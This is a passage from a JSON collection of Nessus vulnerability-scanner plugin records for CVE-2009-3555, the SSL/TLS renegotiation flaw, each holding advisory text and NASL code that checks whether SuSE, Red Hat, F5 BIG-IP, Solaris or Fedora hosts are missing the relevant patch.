["cpe:/o:suse:suse_linux"], "id": "SUSE9_12621.NASL", "href": "https://www.tenable.com/plugins/nessus/46863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46863);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java 1.4.2 (YOU Patch Number 12621)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to Version U13 FP 4 iFixes, to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, and also SAP installer\nrelated bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava2-JRE-1.4.2_sr13.4-0.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava2-SDK-1.4.2_sr13.4-0.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava2-JRE-1.4.2_sr13.4-0.10\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava2-SDK-1.4.2_sr13.4-0.10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T13:07:34", "description": "Updated openssl097a packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer\nSecurity/Secure Sockets Layer) protocols handled session\nrenegotiation. A man-in-the-middle attacker could use this flaw to\nprefix arbitrary plain text to a client's session (for example, an\nHTTPS connection to a website). This could force the server to process\nan attacker's request as if authenticated using the victim's\ncredentials. This update addresses this flaw by implementing the TLS\nRenegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details\nabout this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the openssl097a library must be\nrestarted, or the system rebooted.", "edition": 29, "published": "2010-05-11T00:00:00", "title": "RHEL 5 : openssl097a (RHSA-2010:0164)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-05-11T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:openssl097a", "cpe:/o:redhat:enterprise_linux:5.4"], "id": "REDHAT-RHSA-2010-0164.NASL", "href": "https://www.tenable.com/plugins/nessus/46275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0164. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46275);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_xref(name:\"RHSA\", value:\"2010:0164\");\n\n script_name(english:\"RHEL 5 : openssl097a (RHSA-2010:0164)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl097a packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer\nSecurity/Secure Sockets Layer) protocols handled session\nrenegotiation. A man-in-the-middle attacker could use this flaw to\nprefix arbitrary plain text to a client's session (for example, an\nHTTPS connection to a website). This could force the server to process\nan attacker's request as if authenticated using the victim's\ncredentials. This update addresses this flaw by implementing the TLS\nRenegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details\nabout this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the openssl097a library must be\nrestarted, or the system rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3555\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-20491\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/20490\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-26039\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/15835\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0164\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl097a package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl097a\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0164\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"openssl097a-0.9.7a-9.el5_4.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl097a\");\n }\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:04:41", "description": "The remote BIG-IP device is missing a patch required by a security\nadvisory.", "edition": 28, "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : SSL Renegotiation vulnerability (SOL10737)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2014-10-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL10737.NASL", "href": "https://www.tenable.com/plugins/nessus/78123", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL10737.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78123);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n\n script_name(english:\"F5 Networks BIG-IP : SSL Renegotiation vulnerability (SOL10737)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n # http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04fbb370\"\n );\n # http://tools.ietf.org/html/rfc5746\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://tools.ietf.org/html/rfc5746\"\n );\n # https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?127ec32a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K10737\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL10737.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL10737\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.1.3\",\"9.2.0-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"9.6.0-9.6.1\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.5-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:33", "description": "SunOS 5.10: wanboot patch.\nDate this patch was last updated by Sun : Jun/18/10", "edition": 21, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 145102-01", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:145102", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_145102-01.NASL", "href": "https://www.tenable.com/plugins/nessus/107577", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107577);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"Solaris 10 (sparc) : 145102-01\");\n script_summary(english:\"Check for patch 145102-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 145102-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10: wanboot patch.\nDate this patch was last updated by Sun : Jun/18/10\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/145102-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 145102-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:145102\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"145102-01\", obsoleted_by:\"142909-17 \", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWcakr\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:00", "description": "Update to 1.1.18, implementing a mitigation for CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-12-18T00:00:00", "title": "Fedora 11 : tomcat-native-1.1.18-1.fc11 (2009-12305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:tomcat-native", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-12305.NASL", "href": "https://www.tenable.com/plugins/nessus/43328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12305.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43328);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"FEDORA\", value:\"2009-12305\");\n\n script_name(english:\"Fedora 11 : tomcat-native-1.1.18-1.fc11 (2009-12305)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.1.18, implementing a mitigation for CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://marc.info/?l\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l\"\n );\n # http://marc.info/?l=tomcat-\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-\"\n );\n # http://marc.info/?l=tomcat-dev&m=125900987921402&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-dev&m=125900987921402&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032829.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bff3c0cc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat-native package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 